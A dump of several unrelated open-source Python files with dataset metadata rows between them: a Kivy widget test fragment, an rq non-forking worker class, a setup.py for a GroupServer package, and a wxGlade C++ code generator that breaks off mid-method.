self.assertEqual(wid.collide_point(200, 0), False)
self.assertEqual(wid.collide_point(500, 500), False)
@unittest.skip("Doesn't work with testsuite, but work alone")
def test_export_to_png(self):
from kivy.core.image import Image as CoreImage
from kivy.uix.button import Button
from os.path import join
wid = Button(text='test', size=(200, 100), size_hint=(None, None))
self.root.add_widget(wid)
tmp = mkdtemp()
wid.export_to_png(join(tmp, 'a.png'))
wid.export_to_png(join(tmp, 'b.png'), scale=.5)
wid.export_to_png(join(tmp, 'c.png'), scale=2)
self.assertEqual(CoreImage(join(tmp, 'a.png')).size, (200, 100))
self.assertEqual(CoreImage(join(tmp, 'b.png')).size, (100, 50))
self.assertEqual(CoreImage(join(tmp, 'c.png')).size, (400, 200))
rmtree(tmp)
self.root.remove_widget(wid)
def test_disabled(self):
from kivy.uix.widget import Widget
w = Widget(disabled=None)
w.disabled = False
w.disabled = True
self.assertEqual(w.disabled, True)
| true | true |
f71026672a7680d364cfb68c1f7b6f4ab8b30417 | 3,152 | py | Python | trader/batch/non_fork_worker.py | 9600dev/mmr | b08e63b7044f2b2061d8679b216822c82d309c86 | [
"Apache-2.0"
] | 12 | 2021-09-22T21:19:23.000Z | 2022-01-03T21:38:47.000Z | trader/batch/non_fork_worker.py | 9600dev/mmr | b08e63b7044f2b2061d8679b216822c82d309c86 | [
"Apache-2.0"
] | null | null | null | trader/batch/non_fork_worker.py | 9600dev/mmr | b08e63b7044f2b2061d8679b216822c82d309c86 | [
"Apache-2.0"
] | 3 | 2021-09-05T23:26:13.000Z | 2022-03-25T01:01:22.000Z | import time
import sys
import random
import datetime
import rq
import rq.job
import rq.compat
import rq.worker
from rq.defaults import (DEFAULT_LOGGING_FORMAT, DEFAULT_LOGGING_DATE_FORMAT)
class NonForkWorker(rq.Worker):
def __init__(self, *args, **kwargs):
if kwargs.get('default_worker_ttl', None) is None:
kwargs['default_worker_ttl'] = 2
super(NonForkWorker, self).__init__(*args, **kwargs)
def work(self, burst=False, logging_level="INFO", date_format=DEFAULT_LOGGING_DATE_FORMAT,
log_format=DEFAULT_LOGGING_FORMAT, max_jobs=None, with_scheduler=False):
self.default_worker_ttl = 2
return super(NonForkWorker, self).work(
burst=burst,
logging_level=logging_level,
date_format=date_format,
log_format=log_format,
max_jobs=max_jobs,
with_scheduler=with_scheduler
)
def execute_job(self, job, queue):
self.main_work_horse(job, queue)
def main_work_horse(self, job, queue):
random.seed()
self._is_horse = True
success = self.perform_job(job, queue)
self._is_horse = False
def perform_job(self, job, queue, heartbeat_ttl=None):
self.prepare_job_execution(job)
self.procline('Processing %s from %s since %s' % (
job.func_name,
job.origin, time.time()))
try:
job.started_at = datetime.datetime.now()
# I have DISABLED the time limit!
rv = job.perform()
# Pickle the result in the same try-except block since we need to
# use the same exc handling when pickling fails
job._result = rv
job._status = rq.job.JobStatus.FINISHED
job.ended_at = datetime.datetime.now()
with self.connection.pipeline() as pipeline:
pipeline.watch(job.dependents_key)
queue.enqueue_dependents(job, pipeline=pipeline)
self.set_current_job_id(None, pipeline=pipeline)
self.increment_successful_job_count(pipeline=pipeline)
result_ttl = job.get_result_ttl(self.default_result_ttl)
if result_ttl != 0:
job.save(pipeline=pipeline, include_meta=False)
job.cleanup(result_ttl, pipeline=pipeline,
remove_from_queue=False)
pipeline.execute()
except:
# Use the public setter here, to immediately update Redis
job.status = rq.job.JobStatus.FAILED
self.handle_exception(job, *sys.exc_info())
return False
if rv is None:
self.log.info('Job OK')
else:
self.log.info('Job OK, result = %s' % (rq.worker.yellow(rq.compat.text_type(rv)),))
if result_ttl == 0:
self.log.info('Result discarded immediately.')
elif result_ttl > 0:
self.log.info('Result is kept for %d seconds.' % result_ttl)
else:
self.log.warning('Result will never expire, clean up result key manually.')
return True | 33.178947 | 95 | 0.611675 | import time
import sys
import random
import datetime
import rq
import rq.job
import rq.compat
import rq.worker
from rq.defaults import (DEFAULT_LOGGING_FORMAT, DEFAULT_LOGGING_DATE_FORMAT)
class NonForkWorker(rq.Worker):
def __init__(self, *args, **kwargs):
if kwargs.get('default_worker_ttl', None) is None:
kwargs['default_worker_ttl'] = 2
super(NonForkWorker, self).__init__(*args, **kwargs)
def work(self, burst=False, logging_level="INFO", date_format=DEFAULT_LOGGING_DATE_FORMAT,
log_format=DEFAULT_LOGGING_FORMAT, max_jobs=None, with_scheduler=False):
self.default_worker_ttl = 2
return super(NonForkWorker, self).work(
burst=burst,
logging_level=logging_level,
date_format=date_format,
log_format=log_format,
max_jobs=max_jobs,
with_scheduler=with_scheduler
)
def execute_job(self, job, queue):
self.main_work_horse(job, queue)
def main_work_horse(self, job, queue):
random.seed()
self._is_horse = True
success = self.perform_job(job, queue)
self._is_horse = False
def perform_job(self, job, queue, heartbeat_ttl=None):
self.prepare_job_execution(job)
self.procline('Processing %s from %s since %s' % (
job.func_name,
job.origin, time.time()))
try:
job.started_at = datetime.datetime.now()
rv = job.perform()
job._result = rv
job._status = rq.job.JobStatus.FINISHED
job.ended_at = datetime.datetime.now()
with self.connection.pipeline() as pipeline:
pipeline.watch(job.dependents_key)
queue.enqueue_dependents(job, pipeline=pipeline)
self.set_current_job_id(None, pipeline=pipeline)
self.increment_successful_job_count(pipeline=pipeline)
result_ttl = job.get_result_ttl(self.default_result_ttl)
if result_ttl != 0:
job.save(pipeline=pipeline, include_meta=False)
job.cleanup(result_ttl, pipeline=pipeline,
remove_from_queue=False)
pipeline.execute()
except:
job.status = rq.job.JobStatus.FAILED
self.handle_exception(job, *sys.exc_info())
return False
if rv is None:
self.log.info('Job OK')
else:
self.log.info('Job OK, result = %s' % (rq.worker.yellow(rq.compat.text_type(rv)),))
if result_ttl == 0:
self.log.info('Result discarded immediately.')
elif result_ttl > 0:
self.log.info('Result is kept for %d seconds.' % result_ttl)
else:
self.log.warning('Result will never expire, clean up result key manually.')
return True | true | true |
f710267bb6eaca71d34daef2c77ac942970d7e2a | 2,601 | py | Python | setup.py | groupserver/gs.site.change.name | fdf9a6d2ea2b49c98f5fe0f88ba1de06c57ff052 | [
"ZPL-2.1"
] | null | null | null | setup.py | groupserver/gs.site.change.name | fdf9a6d2ea2b49c98f5fe0f88ba1de06c57ff052 | [
"ZPL-2.1"
] | null | null | null | setup.py | groupserver/gs.site.change.name | fdf9a6d2ea2b49c98f5fe0f88ba1de06c57ff052 | [
"ZPL-2.1"
] | null | null | null | # -*- coding: utf-8 -*-
############################################################################
#
# Copyright © 2011, 2012, 2013, 2014, 2015 OnlineGroups.net and
# Contributors.
#
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
############################################################################
import codecs
import os
from setuptools import setup, find_packages
from version import get_version
version = get_version()
with codecs.open('README.rst', encoding='utf-8') as f:
long_description = f.read()
with codecs.open(os.path.join("docs", "HISTORY.rst"),
encoding='utf-8') as f:
long_description += '\n' + f.read()
setup(
name='gs.site.change.name',
version=version,
description="Change the name of a GroupServer site",
long_description=long_description,
classifiers=[
'Development Status :: 5 - Production/Stable',
"Environment :: Web Environment",
"Framework :: Zope2",
"Intended Audience :: Developers",
'License :: OSI Approved :: Zope Public License',
"Natural Language :: English",
"Natural Language :: French",
"Natural Language :: German",
"Operating System :: POSIX :: Linux",
"Programming Language :: Python",
"Topic :: Software Development :: Libraries :: Python Modules",
],
keywords='site ,groupserver, name, configure, admin',
author='Michael JasonSmith',
author_email='mpj17@onlinegroups.net',
url='https://source.iopen.net/groupserver/gs.site.change.name/',
license='ZPL 2.1',
packages=find_packages(exclude=['ez_setup']),
namespace_packages=['gs', 'gs.site', 'gs.site.change', ],
include_package_data=True,
zip_safe=False,
install_requires=[
'setuptools',
'zope.formlib',
'zope.browserpage',
'zope.i18n[compile]',
'zope.i18nmessageid',
'zope.interface',
'zope.schema',
'zope.tal',
'zope.tales',
'zope.viewlet',
'Zope2',
'gs.content.form.base',
'gs.content.layout',
'gs.help',
'gs.site.change.base',
'Products.GSContent',
],
entry_points="""
# -*- Entry points: -*-
""",)
| 33.346154 | 76 | 0.595925 | true | true | |
f71028c1481c1fcee06411fa05f09fe527e33b31 | 50,356 | py | Python | codegen/cpp_codegen.py | ardovm/wxGlade | a4cf8e65bcc6df5f65cf8ca5c49b9a628bf1e8eb | [
"MIT"
] | null | null | null | codegen/cpp_codegen.py | ardovm/wxGlade | a4cf8e65bcc6df5f65cf8ca5c49b9a628bf1e8eb | [
"MIT"
] | null | null | null | codegen/cpp_codegen.py | ardovm/wxGlade | a4cf8e65bcc6df5f65cf8ca5c49b9a628bf1e8eb | [
"MIT"
] | null | null | null | """\
C++ code generator
@copyright: 2002-2007 Alberto Griggio
@copyright: 2012-2016 Carsten Grohmann
@copyright: 2017-2020 Dietmar Schwertberger
@license: MIT (see LICENSE.txt) - THIS PROGRAM COMES WITH NO WARRANTY
"""
import os.path, re, logging
from codegen import BaseLangCodeWriter, BaseSourceFileContent, _replace_tag
from codegen import ClassLines as BaseClassLines
import config, wcodegen
class SourceFileContent(BaseSourceFileContent):
"""Keeps info about an existing file that has to be updated, to replace only the lines inside a wxGlade block,
and to keep the rest of the file as it was.
@ivar event_handlers: dictionary of event handlers for each class
@ivar header_content: Content of the header file
@ivar source_content: Content of the source file"""
rec_block_start = re.compile(
r'^(?P<spaces>\s*)' # leading spaces
r'//\s*' # comment sign
r'begin\s+wxGlade:\s*' # "begin wxGlade:" statement and tailing spaces
r'(?P<classname>\w*)' # class or function name
r'::' # separator between class and function / block (non-greedy)
r'(?P<block>\w+)' # function / block name
r'\s*$' # tailing spaces
)
rec_block_end = re.compile(
r'^\s*' # leading spaces
r'//\s*' # comment sign
r'end\s+wxGlade' # "end exGlade" statement
r'\s*$' # tailing spaces
)
rec_class_end = re.compile(
r'^\s*};\s*' # closing curly brackets
r'//\s*' # comment sign
r'wxGlade:\s+end\s+class' # "wxGlade: end class" statement
r'\s*$' # tailing spaces
)
"Regexp to match last line of a class statement"
rec_class_decl = re.compile(
r'^\s*' # leading spaces
r'class\s+([a-zA-Z_]\w*)' # "class <name>" statement
r'\s*' # tailing spaces
)
"""Regexp to match class declarations
This isn't very accurate - doesn't match template classes, nor virtual
inheritance, but should be enough for most cases"""
rec_decl_event_table = re.compile(
r'^\s*' # leading spaces
r'DECLARE_EVENT_TABLE\s*\(\s*\)\s*;?' # declaration of the event table
r'\s*$' # tailing spaces
)
"Regexp to match declaration of event table"
rec_def_event_table = re.compile(
r'^\s*' # leading spaces
r'BEGIN_EVENT_TABLE\s*\(\s*(\w+)\s*,\s*(\w+)\s*\)'
r'\s*$' # tailing spaces
)
"Regexp to match event table"
rec_event_handler = re.compile(
r'^\s*' # leading spaces
r'(?:virtual\s+)?'
r'void\s+(?P<handler>[A-Za-z_]+\w*)' # event handler name
r'\s*' # optional spaces
r'\([A-Za-z_:0-9]+\s*&\s*\w*\)\s*;'
r'\s*' # optional spaces
r'//\s*wxGlade:\s*<event_handler>' # wxGlade event handler statement
r'\s*$' # tailing spaces
)
rec_event_handlers_marker = re.compile(
r'^\s*' # leading spaces
r'//\s*wxGlade:\s*add\s+'
r'((?:\w|:)+)\s+event handlers'
r'\s*$' # tailing spaces
)
"Regexp to match wxGlade comment of event handlers"
def __init__(self, name, code_writer):
# initialise new variables first
self.header_content = None
#self.source_content = None
self.content = None
self.event_table_decl = {}
self.event_table_def = {}
self.header_extension = code_writer.header_extension
self.source_extension = code_writer.source_extension
# call inherited constructor
BaseSourceFileContent.__init__(self, name, code_writer)
def replace_header(self, tag, content):
return _replace_tag(self.header_content, tag, content)
def build_untouched_content(self):
BaseSourceFileContent.build_untouched_content(self)
self._build_untouched(self.name + "." + self.header_extension, True)
BaseSourceFileContent.build_untouched_content(self)
self._build_untouched(self.name + "." + self.source_extension, False)
def _build_untouched(self, filename, is_header):
prev_was_handler = False
events_tag_added = False
inside_block = False
inside_comment = False
tmp_in = self._load_file(filename)
out_lines = []
check_old_methods = [] # list of indices with set_properties or do_layout
for line in tmp_in:
comment_index = line.find('/*')
if not inside_comment and comment_index != -1 and comment_index > line.find('//'):
inside_comment = True
if inside_comment:
end_index = line.find('*/')
if end_index > comment_index:
inside_comment = False
if not is_header:
result = None
else:
result = self.rec_class_decl.match(line)
if not inside_comment and not inside_block and result:
if not self.class_name:
# this is the first class declared in the file: insert the new ones before this
out_lines.append( '<%swxGlade insert new_classes>' % self.nonce )
self.new_classes_inserted = True
self.class_name = result.group(1)
self.class_name = self.format_classname(self.class_name)
self.classes.add( self.class_name ) # add the found class to the list of classes of this module
out_lines.append(line)
elif not inside_block:
result = self.rec_block_start.match(line)
if not inside_comment and result:
# replace the lines inside a wxGlade block with a tag that will be used later by add_class
spaces = result.group('spaces')
which_class = result.group('classname')
which_block = result.group('block')
if not which_class:
which_class = self.class_name
else:
which_class = self.format_classname(which_class)
self.spaces[which_class] = spaces
inside_block = True
if which_block in ("do_layout","set_properties"):
# probably to be removed
check_old_methods.append( len(out_lines) )
out_lines.append( '<%swxGlade replace %s %s>' %
(self.nonce, result.group('classname'), result.group('block') ) )
else:
dont_append = False
# ALB 2004-12-08 event handling support...
if is_header and not inside_comment:
result = self.rec_event_handler.match(line)
if result:
prev_was_handler = True
which_handler = result.group('handler')
which_class = self.class_name
self.event_handlers.setdefault( which_class, set() ).add( which_handler )
else:
if prev_was_handler:
# add extra event handlers here...
out_lines.append('<%swxGlade event_handlers %s>' % (self.nonce, self.class_name) )
prev_was_handler = False
events_tag_added = True
elif not events_tag_added and \
self.is_end_of_class(line):
out_lines.append( '<%swxGlade event_handlers %s>' % (self.nonce, self.class_name) )
# now try to see if we already have a DECLARE_EVENT_TABLE
result = self.rec_decl_event_table.match(line)
if result:
self.event_table_decl[self.class_name] = True
elif not inside_comment:
result = self.rec_event_handlers_marker.match(line)
if result:
out_lines.append( '<%swxGlade add %s event handlers>' % (self.nonce, result.group(1)) )
dont_append = True
result = self.rec_def_event_table.match(line)
if result:
which_class = result.group(1)
self.event_table_def[which_class] = True
# ----------------------------------------
if not dont_append:
out_lines.append(line)
else:
# ignore all the lines inside a wxGlade block
if self.rec_block_end.match(line):
inside_block = False
if is_header and not self.new_classes_inserted:
# if we are here, the previous ``version'' of the file did not contain any class, so we must add the
# new_classes tag at the end of the file
out_lines.append('<%swxGlade insert new_classes>' % self.nonce)
# when moving from 0.9 to 1.0: remove empty methods "do_layout" and "set_properties"
while check_old_methods:
i = check_old_methods.pop(-1)
if out_lines[i+1].strip()=='}': # just end of block -> remove incl. trailing empty lines
self._remove_method(out_lines, i-2, i+1)
# set the ``persistent'' content of the file
if is_header:
self.header_content = out_lines
else:
self.content = out_lines
def is_end_of_class(self, line):
"""Returns True if the line is the last line of a class
Not really, but for wxglade-generated code it should work..."""
return self.rec_class_end.match(line)
class ClassLines(BaseClassLines):
"""Stores the lines of C++ code for a custom class"""
def __init__(self):
BaseClassLines.__init__(self)
self.ids = [] # Ids declared in the source (for Evt. handling): grouped in a public enum in the custom class
self.sub_objs = [] # List of 2-tuples (type, name) of the sub-objects; attributes of the toplevel object
self.extra_code_h = [] # Extra header code to output
self.extra_code_cpp = [] # Extra source code to output
self.dependencies = set()
class CPPCodeWriter(BaseLangCodeWriter, wcodegen.CppMixin):
"""Code writer class for writing C++ code out of the designed GUI elements
source_extension: Extension of the source file
header_extension: Extension of the header file
last_generated_id: Last generated Id number (wxNewId() is not used yet)
tmpl_init_gettext: Template for inclusion of i18n headers and defining APP_CATALOG constant or None
see: BaseLangCodeWriter"""
ClassLines = ClassLines
_code_statements = {
'backgroundcolour': "%(objname)sSetBackgroundColour(%(value)s);\n",
'disabled': "%(objname)sEnable(0);\n",
'extraproperties': "%(objname)sSet%(propname_cap)s(%(value)s);\n",
'focused': "%(objname)sSetFocus();\n",
'foregroundcolour': "%(objname)sSetForegroundColour(%(value)s);\n",
'hidden': "%(objname)sHide();\n",
'setfont': "%(objname)sSetFont(wxFont(%(size)s, %(family)s, "
"%(style)s, %(weight)s, %(underlined)s, wxT(%(face)s)));\n",
'tooltip': "%(objname)sSetToolTip(%(tooltip)s);\n",
'wxcolour': "wxColour(%(value)s)",
'wxnullcolour': "wxNullColour",
'wxsystemcolour': "wxSystemSettings::GetColour(%(value)s)",
}
class_separator = '::'
language_note = \
'// Example for compiling a single file project under Linux using g++:\n' \
'// g++ MyApp.cpp $(wx-config --libs) $(wx-config --cxxflags) -o MyApp\n' \
'//\n' \
'// Example for compiling a multi file project under Linux using g++:\n' \
'// g++ main.cpp $(wx-config --libs) $(wx-config --cxxflags) -o MyApp Dialog1.cpp Frame1.cpp\n' \
'//\n'
output_name = None # If not None, name (without extension) of the file to write into
output_header = None # Temporary storage of header file for writing into (list)
output_file = None # Temporary storage of source file for writing into (list)
shebang = '// -*- C++ -*-\n//\n'
tmpl_cfunc_end = '}\n\n'
tmpl_sizeritem = '%s->Add(%s, %s, %s, %s);\n'
tmpl_sizeritem_button = '%s->AddButton(%s)\n'
tmpl_gridbagsizeritem = '%s->Add(%s, wxGBPosition%s, wxGBSpan%s, %s, %s);\n'
tmpl_gridbagsizerspacer = '%s->Add(%s, %s, wxGBPosition%s, wxGBSpan%s, %s, %s);\n'
tmpl_spacersize = '%s, %s'
tmpl_appfile = """\
%(overwrite)s\
%(header_lines)s\
#include "%(filename_top_win_class)s"
"""
tmpl_init_gettext = """\
#include <wx/intl.h>
#ifndef APP_CATALOG
#define APP_CATALOG "%(textdomain)s" // replace with the appropriate catalog name
#endif
"""
def _get_app_template(self, app, top_win):
'build template string for application'
if not self.app_name: return None
# XXX use Show() for frames/panels and ShowModal()/Destroy for dialogs
klass = app.klass
if self._use_gettext:
gettext1 = ["protected:", "%(tab)swxLocale m_locale; // locale we'll be using"]
gettext2 = ['%(tab)sm_locale.Init();',
'#ifdef APP_LOCALE_DIR',
'%(tab)sm_locale.AddCatalogLookupPathPrefix(wxT(APP_LOCALE_DIR));',
'#endif',
'%(tab)sm_locale.AddCatalog(wxT(APP_CATALOG));\n']
else:
gettext1 = gettext2 = []
if klass:
klass1 = 'class %(klass)s: public wxApp {'
klass2 = ['IMPLEMENT_APP(%(klass)s)\n',
'bool %(klass)s::OnInit()']
else:
klass1 = 'class MyApp: public wxApp {'
klass2 = ['IMPLEMENT_APP(MyApp)\n',
'bool MyApp::OnInit()',]
ret = ['', klass1,
'public:', '%(tab)sbool OnInit();'
] + gettext1 + ['};\n'] + klass2 + ['{'] + gettext2 + [
'%(tab)swxInitAllImageHandlers();',
'%(tab)s%(top_win_class)s* %(top_win)s = new %(top_win_class)s(NULL, wxID_ANY, wxEmptyString);',
'%(tab)sSetTopWindow(%(top_win)s);',
'%(tab)s%(top_win)s->Show();',
'%(tab)sreturn true;',
'}', '']
return '\n'.join(ret)
tmpl_empty_string = 'wxEmptyString'
def init_lang(self, app=None):
self.last_generated_id = 1000
self.generated_ids = {}
# Extensions and main filename based on Project options when set
if app is not None:
self.source_extension = app.source_extension or config.default_source_extension
self.header_extension = app.header_extension or config.default_header_extension
else:
self.source_extension = config.default_source_extension
self.header_extension = config.default_header_extension
if hasattr(app, "app_filename"): # only for testing
base = os.path.splitext(app.app_filename)[0]
else:
base = os.path.splitext(config.default_cpp_app_name)[0] #
self.app_filename = '%s.%s' % (base, self.source_extension)
self.header_lines = [ '#include <wx/wx.h>\n',
'#include <wx/image.h>\n' ]
# include i18n / gettext
if self._use_gettext and self._textdomain:
self.header_lines.append( self.tmpl_init_gettext % {'textdomain': self._textdomain} )
# extra lines to generate (see the 'extracode' property of top-level widgets)
self._current_extra_code_h = []
self._current_extra_code_cpp = []
def init_files(self, out_path):
if self.multiple_files:
self.previous_source = None
self.out_dir = out_path
else:
name = os.path.splitext(out_path)[0]
self.output_name = name
if not self._overwrite:
header_exists = self._file_exists(name + "." + self.header_extension)
source_exists = self._file_exists(name + "." + self.source_extension)
if (header_exists and not source_exists) or (source_exists and not header_exists):
ret = _("To keep existing user code, both header and source file must exist.\n"
"(files '%s...'")
return ret%name
if not self._overwrite and header_exists:
# keep all the lines not inside a wxGlade block.
self.previous_source = SourceFileContent(name, self)
else:
# if the file doesn't exist, create it and write the intro
self.previous_source = None
self.output_header = []
self.output_file = []
# isolation directives
oh = os.path.basename(name + "." + self.header_extension).upper().replace( '.', '_' )
self.output_header.append('#ifndef %s\n#define %s\n' % (oh, oh))
self.output_header.append('\n')
for line in self.header_lines:
self.output_header.append(line)
self.output_header.append('\n')
# now, write the tags to store dependencies and extra code
self.output_header.append('<%swxGlade replace dependencies>' % self.nonce)
self.output_header.append('\n')
self.output_header.append('<%swxGlade replace extracode>' % self.nonce)
self.output_header.append('\n')
self.output_file.append('#include "%s.%s"\n\n' % (os.path.basename(name), self.header_extension))
self.output_file.append('<%swxGlade replace extracode>\n' % self.nonce)
self.output_file.append('\n')
def output_header_replace(self, tag, content):
_replace_tag(self.output_header, tag, content)
def finalize(self):
if self.previous_source:
# insert all the new custom classes inside the old file
tag = '<%swxGlade insert new_classes>' % self.nonce
if self.previous_source.new_classes:
code = "".join([c[0] for c in self.previous_source.new_classes])
else:
code = ""
self.previous_source.replace_header(tag, code)
extra_source = "".join([c[1] for c in self.previous_source.new_classes])
# extra code (see the 'extracode' property of top-level widgets)
tag = '<%swxGlade replace extracode>' % self.nonce
code = self._tagcontent( '::extracode', self._current_extra_code_h )
self.previous_source.replace_header(tag, code)
code = self._tagcontent( '::extracode', self._current_extra_code_cpp )
self.previous_source.replace(tag, code)
# --------------------------------------------------------------
# now remove all the remaining <123415wxGlade ...> tags from the source:
# this may happen if we're not generating multiple files, and one of the container class names is changed
tags = re.compile( r'(<%swxGlade replace ([a-zA-Z_]*\w*) (\w+)>)' % self.nonce )
for i,line in enumerate(self.previous_source.header_content):
match = tags.match(line)
if not match: continue
tag = match.groups()
if tag[2] == 'dependencies':
#self._logger.debug('writing dependencies')
deps = set()
for code in self.classes.values():
deps.update(code.dependencies)
lines = self._format_dependencies( deps )
elif tag[2] == 'methods':
lines = ''
else:
lines = '// content of this block (%s) not found: did you rename this class?\n' % tag[2]
self.previous_source.replace_header(tag[0], lines)
# remove all the remaining <123415wxGlade ...> tags in source file XXX make more efficient
self._content_notfound( self.previous_source )
tag_start = r'<%swxGlade add ' % self.nonce
tag_end = r' event_handlers>'
for i, line in enumerate(self.previous_source.content):
if line.startswith(tag_start) and line.endswith(tag_end):
source_content.content[i] = ""
# write the new file contents to disk
header_content = "".join( self.previous_source.header_content )
self.save_file( self.previous_source.name + "." + self.header_extension, header_content, content_only=True )
if extra_source:
extra_source = '\n\n' + extra_source
source_content = "".join( self.previous_source.content )
self.save_file( self.previous_source.name + "." + self.source_extension, source_content + extra_source,
content_only=True )
elif not self.multiple_files:
oh = os.path.basename(self.output_name).upper() + '_H'
self.output_header.append('\n#endif // %s\n' % oh)
# write the list of include files
deps = set()
for code in self.classes.values():
deps.update(code.dependencies)
code = self._format_dependencies( deps )
self.output_header_replace( '<%swxGlade replace dependencies>' % self.nonce, code )
# extra code (see the 'extracode' property of top-level widgets)
tag = '<%swxGlade replace extracode>' % self.nonce
code = self._tagcontent('::extracode', self._current_extra_code_h)
self.output_header_replace( tag, code )
code = self._tagcontent('::extracode', self._current_extra_code_cpp)
self.output_file_replace( tag, code )
self.save_file( self.output_name + "." + self.header_extension, self.output_header, self._app_added )
self.save_file( self.output_name + "." + self.source_extension, self.output_file, self._app_added )
self.output_file = self.output_header = None
def add_app(self, app_attrs, top_win):
# add language specific mappings
self.lang_mapping['filename_top_win_class'] = '%s.%s' % (top_win.klass, self.header_extension)
BaseLangCodeWriter.add_app(self, app_attrs, top_win)
def add_class(self, code_obj):
assert code_obj not in self.classes
try:
builder = self.obj_builders[code_obj.WX_CLASS]
except KeyError:
logging.error('%s', code_obj)
# this is an error, let the exception be raised; the details are logged by the global exception handler
raise
ret = self.classes[code_obj] = self.ClassLines() # ClassLines will collect the code lines incl. children
return ret
def finalize_class(self, code_obj):
# write the collected code for the class and its children
base = code_obj.WX_CLASS
klass = self.classes[code_obj]
classname = code_obj.klass
fmt_klass = self.cn_class(classname)
if self.multiple_files:
# let's see if the file to generate exists, and in this case create a SourceFileContent instance
filename = os.path.join(self.out_dir, classname.replace('::', '_') + "." + self.header_extension)
if self._overwrite or not self._file_exists(filename):
prev_src = None
else:
prev_src = SourceFileContent( os.path.join(self.out_dir, classname), self )
else:
# in this case, previous_source is the SourceFileContent instance
# that keeps info about the single file to generate
prev_src = self.previous_source
if prev_src and classname in prev_src.classes:
is_new = False
else:
# this class wasn't in the previous version of the source (if any)
is_new = True
builder = self.obj_builders[base]
mycn = getattr(builder, 'cn', self.cn)
mycn_f = getattr(builder, 'cn_f', self.cn_f)
# collect all event handlers
event_handlers = klass.event_handlers
for win_id, evt, handler, evt_type in builder.get_event_handlers(code_obj):
event_handlers.append((win_id, mycn(evt), handler, evt_type))
# try to see if there's some extra code to add to this class
extra_code = getattr(builder, 'extracode', getattr(code_obj, 'extracode', "") or "")
if extra_code:
extra_code = re.sub(r'\\n', '\n', extra_code)
extra_code = re.split(re.compile(r'^###\s*$', re.M), extra_code, 1)
klass.extra_code_h.append(extra_code[0])
if len(extra_code) > 1:
klass.extra_code_cpp.append(extra_code[1])
if not is_new:
self.warning( '%s has extra code, but you are not overwriting existing sources:'
' please check that the resulting code is correct!' % code_obj.name )
if not self.multiple_files:
if klass.extra_code_h:
self._current_extra_code_h.append( "".join( klass.extra_code_h[::-1] ) )
if klass.extra_code_cpp:
self._current_extra_code_cpp.append( "".join( klass.extra_code_cpp[::-1] ) )
default_sign = [('wxWindow*', 'parent'), ('wxWindowID', 'id')]
sign = getattr(builder, 'constructor', default_sign)
defaults = []
for t in sign:
if len(t) == 3:
defaults.append(t[2])
else:
defaults.append(None)
tmp_sign = [t[0] + ' ' + t[1] for t in sign]
sign_decl2 = ', '.join(tmp_sign)
for i in range(len(tmp_sign)):
if defaults[i]:
tmp_sign[i] += '=%s' % defaults[i]
sign_decl1 = ', '.join(tmp_sign)
sign_inst = ', '.join([t[1] for t in sign])
# custom base classes support
custom_base = code_obj.check_prop_nodefault('custom_base') and code_obj.custom_base.strip() or None
# the header and code lines
header_buffer = []
source_buffer = []
hwrite = header_buffer.append
swrite = source_buffer.append
# generate constructor code
if is_new:
pass
elif custom_base:
# custom base classes set, but "overwrite existing sources" not
# set. Issue a warning about this
self.warning( '%s has custom base classes, but you are not overwriting existing sources: '
'please check that the resulting code is correct!' % code_obj.name )
if is_new:
# header file
if custom_base:
base = ", public ".join([b.strip() for b in custom_base.split(',')])
hwrite('\nclass %s: public %s {\n' % (fmt_klass, base))
hwrite('public:\n')
# the first thing to add it the enum of the various ids
if self._mark_blocks:
hwrite(self.tabs(1) + '// begin wxGlade: %s::ids\n' % fmt_klass)
ids = klass.ids
# let's try to see if there are extra ids to add to the enum
if hasattr(builder, 'get_ids_code'):
ids.extend(builder.get_ids_code(code_obj))
if ids:
hwrite(self.tabs(1) + 'enum {\n')
for id_name in ids:
hwrite('%s%s,\n' % (self.tabs(2), id_name))
hwrite(self.tabs(1) + '};\n')
if self._mark_blocks:
hwrite(self.tabs(1) + '// end wxGlade\n\n')
# constructor prototype
hwrite(self.tabs(1) + '%s(%s);\n' % (fmt_klass, sign_decl1))
hwrite('\nprivate:\n')
# declarations of the attributes
hwrite('\n')
hwrite('protected:\n')
hwrite(self.tabs(1) + '// begin wxGlade: %s::attributes\n' % fmt_klass)
for o_type, o_name in klass.sub_objs:
hwrite(self.tabs(1) + '%s* %s;\n' % (o_type, o_name))
hwrite(self.tabs(1) + '// end wxGlade\n')
if event_handlers:
t = self.tabs(1)
hwrite('\n' + t + 'DECLARE_EVENT_TABLE();\n')
hwrite('\npublic:\n')
already_there = set()
for win_id, evt, handler, evt_type in event_handlers:
if handler not in already_there:
hwrite('%svirtual void %s(%s &event); // wxGlade: <event_handler>\n' % (t, handler, evt_type))
already_there.add( handler )
hwrite('}; // wxGlade: end class\n\n')
elif prev_src:
if self._mark_blocks:
hwrite(self.tabs(1) + '// begin wxGlade: %s::ids\n' % fmt_klass)
ids = klass.ids
# let's try to see if there are extra ids to add to the enum
if hasattr(builder, 'get_ids_code'):
ids.extend(builder.get_ids_code(code_obj))
if ids:
hwrite(self.tabs(1) + 'enum {\n')
for id_name in ids:
hwrite('%s%s,\n' % (self.tabs(2), id_name))
hwrite(self.tabs(1) + '};\n')
if self._mark_blocks:
hwrite(self.tabs(1) + '// end wxGlade\n')
tag = '<%swxGlade replace %s ids>' % (self.nonce, classname)
if not prev_src.replace_header( tag, "".join(header_buffer) ):
# no ids tag found, issue a warning and do nothing
self.warning("wxGlade ids block not found for %s, ids declarations code NOT generated" % code_obj.name)
# remove methods block if in old file
tag = '<%swxGlade replace %s methods>' % (self.nonce, classname)
prev_src.replace_header(tag, [])
header_buffer = []
hwrite = header_buffer.append
if self._mark_blocks:
hwrite(self.tabs(1) + '// begin wxGlade: %s::attributes\n' % fmt_klass)
for o_type, o_name in klass.sub_objs:
hwrite(self.tabs(1) + '%s* %s;\n' % (o_type, o_name))
if self._mark_blocks:
hwrite(self.tabs(1) + '// end wxGlade\n')
tag = '<%swxGlade replace %s attributes>' % (self.nonce, classname)
if not prev_src.replace_header(tag, "".join(header_buffer)):
# no attributes tag found, issue a warning and do nothing
self.warning( "wxGlade attributes block not found for %s, attributes declarations code NOT generated" %
code_obj.name )
header_buffer = []
hwrite = header_buffer.append
if event_handlers:
